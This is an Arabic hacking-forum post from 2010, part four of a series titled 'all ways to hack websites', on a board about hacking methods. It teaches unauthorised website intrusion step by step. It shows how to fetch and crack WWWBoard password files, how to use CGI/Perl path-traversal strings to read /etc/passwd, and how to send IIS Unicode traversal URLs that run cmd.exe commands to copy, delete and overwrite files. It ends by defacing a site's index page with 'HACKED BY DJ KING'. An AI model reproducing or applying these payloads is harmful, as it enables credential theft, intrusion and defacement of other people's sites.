ايجى فــــوريــــــــو
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع 25901920
ايجى فــــوريــــــــو
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع 25901920
ايجى فــــوريــــــــو
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

ايجى فــــوريــــــــو

 
الرئيسيةالعاب-برامج.الخأحدث الصورالتسجيلدخول
دخول
اسم العضو:
كلمة السر:
ادخلني بشكل آلي عند زيارتي مرة اخرى: 
:: لقد نسيت كلمة السر
التوقيت
>

المواضيع الأخيرة
» معلومات نادرة جدا عن ...ادخل وشوف
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالأربعاء نوفمبر 30, 2011 1:41 pm من طرف رجل الرعد

» بركان ايرتا الى فى اثيوبيا ثائر دائما
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 11:53 pm من طرف argon

» زنجبار ارض التوابل والسلاطين
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 11:47 pm من طرف argon

» كيف تعطرين شعرك بطريقة صحية وامنة
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 11:45 pm من طرف argon

» صور من افريقيا
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 11:44 pm من طرف argon

» الحلقة العاشرة: حقيبة من الأوزار
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 2:51 pm من طرف Mr.snake

» الحلقة التاسعة: ضحك ودموع في المؤتمر الدولى
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 2:36 pm من طرف Mr.snake

» يوميات رعد العبقرى الحلقة الثامنة: الصفحات القديمة
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 2:08 pm من طرف Mr.snake

» الحلقة السابعة: لغز ريتا
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس يوليو 22, 2010 2:04 pm من طرف Mr.snake


 

 جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع

اذهب الى الأسفل 
كاتب الموضوعرسالة
Mr.snake
كبير الايجاويه
كبير الايجاويه
Mr.snake


عدد المساهمات : 167
تاريخ التسجيل : 19/02/2010
العمر : 28
الموقع : الكرة الارضية

جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Empty
مُساهمةموضوع: جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع   جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع Emptyالخميس مارس 18, 2010 8:03 pm

بسم الله الرحمن الرحيم
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:


ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب
هنـــــــــا
--------------------------------------------------------------------
3 - شرح ثغرة سي جي اي وكيفية استغلالها:

CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
فتكتب الثغرة هكذا في المتفح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd

اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:

IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] +c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
*************************************************
طريقه استغلال ثغرات اي اي اس بكذى طريقه

يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال
cmd.exe
لتنفيذ اوامرنا
مثال للثغره و تطبيق الاوامر:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
-----------------------------------------------------------------------------------
امر انشاء دليل جديد
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ
-----------------------------------------------------------------------------------
امر الغاء دليل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ
-----------------------------------------------------------------------------------
الامر المستخدم للنسخ
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe
-----------------------------------------------------------------------------------
الامر المستخدم للحذف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp
-----------------------------------------------------------------------------------
الامر المستخدم لتغيير مسمى الملف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
-----------------------------------------------------------------------------------
لامر المستخدم لرؤية محتويات الملف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm
-----------------------------------------------------------------------------------
الامر المستخدم للكتابة داخل أي ملف
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt
-----------------------------------------------------------------------------------
ملحوظه :
--------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون
msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

و الان لتغيير الصفحه الاولى لموقع لابد من :
الكتابه على الصفحه الرئيسيه مستخدمين الامر
echo
برفع صفحتك الشخصيه بواسطة برنامج ال
TFTP
طريقة الكتابه على الملف الرئيسي للموقع
index.htm
باستخدام الامر
echo
------------------------
مبدئيا لابد من نسخ ملف
cmd.exe
الي مجلد
scripts
بهذا الشكل على سبيل المثال :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.e xe
-----------------------------------------------------------------------------------
و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
و بعدها يمكن تنفيذ الامر
echo
بالشكل التالي
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
----------------------------------------------------------------------------------- :farao: :farao:
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://egy4you.mam9.com
 
جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الرابع
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء السادس
» جميع طرق اختراق المواقع هااااااااااااااااااااااااااااااااااام الجزء السابع
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الثانى
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الثالث
» جميع طرق اختراق المواقع هاااااااااااااااااااااااااااااااااااااااااااااام الجزء الخامس

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
ايجى فــــوريــــــــو :: الهكر العام :: اساليب الهكر والاختراق-
انتقل الى: